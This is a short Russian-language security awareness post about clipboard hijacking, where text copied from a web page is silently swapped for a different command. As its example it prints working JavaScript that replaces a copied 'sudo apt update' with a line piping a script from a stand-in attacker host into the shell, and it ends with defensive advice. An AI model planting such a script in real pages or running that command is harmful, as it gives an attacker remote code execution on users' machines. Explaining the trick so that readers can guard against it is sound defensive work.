НИКОГДА не следует копировать команды и вставлять их прямо в свой терминал. Спросите любого разработчика или администратора, копировали ли они когда-либо командную строку или фрагмент кода из Интернета. Ответ, вероятно, будет ДА, всегда так делаю!
Вы думаете, что копируете что-то одно, а оно заменяется чем-то другим, например, вредоносным кодом. Все, что требуется, — это одна строка кода, вставленная в код, который вы скопировали, чтобы создать бэкдор в вашем приложении.
Эта атака очень проста, но при этом очень вредна. Вот как это работает:
Допустим, вы искали, как обновить свой ubuntu, и нашли эту командную строку. И копируете:
Попробуйте — скопируйте команду ниже:
sudo apt update
А теперь вставьте ниже то, что скопировали:
Код отвечающий за это выглядит так:
<strong id="copy">sudo apt update</strong> <script> document.getElementById('copy').addEventListener('copy', function(e) { e.clipboardData.setData('text/plain', 'curl http://attacker-domain:8000/shell.sh | sh\n'); e.preventDefault(); }); </script>
Самый безопасный способ — не вставлять что-либо, скопированное из Интернета, в свой терминал. Также многие терминалы можно настроить так, чтобы они не выполнялись автоматически при вставке «\n» (новая строка)